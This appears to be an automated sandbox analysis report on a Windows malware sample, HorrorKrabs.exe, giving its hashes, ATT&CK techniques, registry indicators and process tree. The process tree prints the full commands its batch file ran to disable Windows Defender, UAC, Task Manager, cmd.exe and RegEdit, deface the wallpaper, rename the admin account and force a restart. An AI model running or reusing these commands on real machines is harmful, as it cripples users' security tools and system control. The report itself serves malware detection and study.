216f31c18146824ec864ce1cd25980075831e6194e8fc8995554239a3070f62f

Resubmissions

28/03/2025, 01:00

250328-bcz46azxfs 10

28/03/2025, 00:55

250328-a9rzdaslz3 10

Analysis

max time kernel
6s
max time network
9s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags

arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
submitted
28/03/2025, 01:00

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

HorrorKrabs.exe
Size

31.1MB
MD5

a9ac58e28c018a526115108405f24c39
SHA1

a3e171ebb50717056d4f66507347e2fc4a812849
SHA256

d1229f89eccd5a1a3b19432deac06425c33564cf373564abbec0e5c8cfbd562e
SHA512

48e96bc307ab6beb2c84ca507a89b84cd5e146421e33ff7af9aa9086a96f806fe9b8d65dc9a5e54c18f1e9427c74255f943bea1868f39b66960741897302e0f2
SSDEEP

196608:/Bq8XWmsNIy3QT2bAx6gHux8fP1FdA29xTxVIVXAUPL7VsPBMHvUDJNkyhtTT0o5:NNsqEd9sf/llE/0NDkyhf5

Score

10^/10

defense_evasion discovery evasion ransomware trojan

Malware Config

Signatures

Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables RegEdit via registry modification 2 IoCs

defense_evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0"	HorrorKrabs.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
defense_evasion

Disables cmd.exe use via registry modification 2 IoCs

defense_evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "0"	HorrorKrabs.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1"	reg.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Control Panel\Desktop\Wallpaper = "c:\\windows\\update32\\bg.bmp"	reg.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\update32\bg.bmp	cmd.exe
File opened for modification	C:\Windows\update32\bg.bmp	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shutdown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HorrorKrabs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "98"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe

Modifies registry key 1 TTPs 5 IoCs

Modify Registry

T1112

pid	Process
768	reg.exe
1040	reg.exe
1604	reg.exe
5052	reg.exe
3508	reg.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	804	shutdown.exe
Token: SeRemoteShutdownPrivilege	804	shutdown.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3128	LogonUI.exe

Suspicious use of WriteProcessMemory 39 IoCs

description	pid	Process	procid_target
PID 236 wrote to memory of 224	236	HorrorKrabs.exe	82
PID 236 wrote to memory of 224	236	HorrorKrabs.exe	82
PID 236 wrote to memory of 224	236	HorrorKrabs.exe	82
PID 224 wrote to memory of 2548	224	cmd.exe	84
PID 224 wrote to memory of 2548	224	cmd.exe	84
PID 224 wrote to memory of 2548	224	cmd.exe	84
PID 224 wrote to memory of 2668	224	cmd.exe	85
PID 224 wrote to memory of 2668	224	cmd.exe	85
PID 224 wrote to memory of 2668	224	cmd.exe	85
PID 224 wrote to memory of 768	224	cmd.exe	86
PID 224 wrote to memory of 768	224	cmd.exe	86
PID 224 wrote to memory of 768	224	cmd.exe	86
PID 224 wrote to memory of 1040	224	cmd.exe	87
PID 224 wrote to memory of 1040	224	cmd.exe	87
PID 224 wrote to memory of 1040	224	cmd.exe	87
PID 224 wrote to memory of 332	224	cmd.exe	88
PID 224 wrote to memory of 332	224	cmd.exe	88
PID 224 wrote to memory of 332	224	cmd.exe	88
PID 224 wrote to memory of 1604	224	cmd.exe	89
PID 224 wrote to memory of 1604	224	cmd.exe	89
PID 224 wrote to memory of 1604	224	cmd.exe	89
PID 224 wrote to memory of 3424	224	cmd.exe	90
PID 224 wrote to memory of 3424	224	cmd.exe	90
PID 224 wrote to memory of 3424	224	cmd.exe	90
PID 3424 wrote to memory of 1168	3424	net.exe	91
PID 3424 wrote to memory of 1168	3424	net.exe	91
PID 3424 wrote to memory of 1168	3424	net.exe	91
PID 224 wrote to memory of 3456	224	cmd.exe	92
PID 224 wrote to memory of 3456	224	cmd.exe	92
PID 224 wrote to memory of 3456	224	cmd.exe	92
PID 224 wrote to memory of 5052	224	cmd.exe	94
PID 224 wrote to memory of 5052	224	cmd.exe	94
PID 224 wrote to memory of 5052	224	cmd.exe	94
PID 224 wrote to memory of 3508	224	cmd.exe	95
PID 224 wrote to memory of 3508	224	cmd.exe	95
PID 224 wrote to memory of 3508	224	cmd.exe	95
PID 224 wrote to memory of 804	224	cmd.exe	96
PID 224 wrote to memory of 804	224	cmd.exe	96
PID 224 wrote to memory of 804	224	cmd.exe	96

System policy modification 1 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	HorrorKrabs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\HideFastUserSwitching = "1"	HorrorKrabs.exe

C:\Users\Admin\AppData\Local\Temp\HorrorKrabs.exe
"C:\Users\Admin\AppData\Local\Temp\HorrorKrabs.exe"
1⤵
- Disables RegEdit via registry modification
- Disables cmd.exe use via registry modification
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
- System policy modification
PID:236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\krabsetup.bat" "
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:224
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\windows\update32\bg.bmp /f
    3⤵
    - Sets desktop wallpaper using registry
    - System Location Discovery: System Language Discovery
    PID:2548
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2668
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:768
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:1040
- - C:\Windows\SysWOW64\reg.exe
    Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender DisableAntiSpyware settings
    - System Location Discovery: System Language Discovery
    PID:332
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:1604
- - C:\Windows\SysWOW64\net.exe
    net user Admin /fullname:"MR KRABS WAS HERE!"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3424
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user Admin /fullname:"MR KRABS WAS HERE!"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1168
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3456
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f
    3⤵
    - Disables cmd.exe use via registry modification
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:5052
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
    3⤵
    - Disables RegEdit via registry modification
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:3508
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown /r /t 00
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:804

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3a24855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3128

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\bg.bmp

Filesize
11.7MB

MD5
009b9f7e5b7b45674e6de11dfbc5873d

SHA1
fc848c11b0eb1c48b6e49e59bfb2df069ccf7756

SHA256
5b40b1922ac983f07ecc3e444813734aa03ce3270b7e5c0dc93610e34ed58de7

SHA512
cfe2087b0711a5d7ce486f338c49d5c6147b3c931f13b3ba27628200f26c3a9776de91a1cabd7bfd274a08fbe7b8a4f9ec172e4f7cfbf3234c8aa35399d03549

Download Submit
C:\Users\Admin\AppData\Local\Temp\krabsetup.bat

Filesize
1KB

MD5
7f5a110ccd8737cebf3f52b49424eecc

SHA1
67a0a8ef8745e20b1cc100a2ab95cde32ad7959a

SHA256
2ae0d42a78a32d4f8f81060cbe29b95eff8a90031690d2b7cc70d540a6110d03

SHA512
68d4d79c3007b50dcbd783f6e3020b8e640613c79943c8cf82456dcb7892baf0466b4f2dba4a3b9da6240cb305acdb3c9000f7b80bf63649ade767d8963476c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\krabslol.exe

Filesize
19.3MB

MD5
e1a919b2c68ec9e615b390adb8064bf0

SHA1
a0cab57b6bdbe2dcb888ea07fe4ed161916f6398

SHA256
6166b3e0ec7478ac54b33edaf001fb2421f15a559bcc0f37f09c08a4e466fda8

SHA512
3e837cd486806d63516488b2ac0a514e2e03bf3d7c511a7aa6c532c0569580cfbe81311d57b4a3621ee151806994e0935cf2528fadfe275a8a9a3242610a4279

Download Submit
memory/236-0-0x000000007474E000-0x000000007474F000-memory.dmp

Filesize
4KB

Download
memory/236-1-0x0000000000760000-0x0000000002688000-memory.dmp

Filesize
31.2MB

Download
memory/236-2-0x00000000070F0000-0x000000000718C000-memory.dmp

Filesize
624KB

Download
memory/236-3-0x0000000007C00000-0x00000000081A6000-memory.dmp

Filesize
5.6MB

Download
memory/236-4-0x0000000007730000-0x00000000077C2000-memory.dmp

Filesize
584KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads